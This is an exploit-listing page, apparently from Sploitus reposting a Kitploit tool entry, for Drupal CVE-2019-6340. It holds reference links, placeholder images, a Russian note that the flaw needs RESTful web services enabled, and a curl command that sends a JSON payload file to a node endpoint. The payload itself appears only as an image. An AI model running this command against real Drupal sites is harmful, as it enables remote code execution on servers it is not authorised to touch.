Sploitus

Exploit for Drupal-SA-CORE-2019-003

kitploit · 2026-08-25

Exploit Code

MARKDOWN26 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-G0RX-DRUPAL-SA-CORE-2019-003
# Drupal-SA-CORE-2019-003 CVE-2019-6340

Drupal SA-CORE-2019-003 CVE-2019-6340

CVE-2019-6340.md https://mp.weixin.qq.com/s/EQD4-K6HgBY9wdzeXeyzkg

https://paper.seebug.org/821/

https://www.youtube.com/watch?v=QtLDDN0Duko

имя ссылки

https://pbs.twimg.com/media/D0C-KiXX4AM2vR3.jpg:large

![marty-mcfly](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

CVE-2019-6340 не является конфигурацией по умолчанию, вам нужно вручную включить Restful веб-сервисы:

![marty-mcfly](https://assets.kitploit.com/production/public/readmes/25695/b9294d79472bb0a339c42e804a11464433f7cd1f519f272e2652a84f59c07591.jpg)

Команда $ curl -k -v -H 'Content-Type: application/json' -d @./drupalrce.json 'https://<http://your.web.site >/node/<node_id>?_format=hal_json'

файл drupalrce.json

![marty-mcfly](https://assets.kitploit.com/production/public/readmes/25695/7141f663ea649b92f288734438d1befe51cb005afe2c3fc90670157af059cc4f.jpg)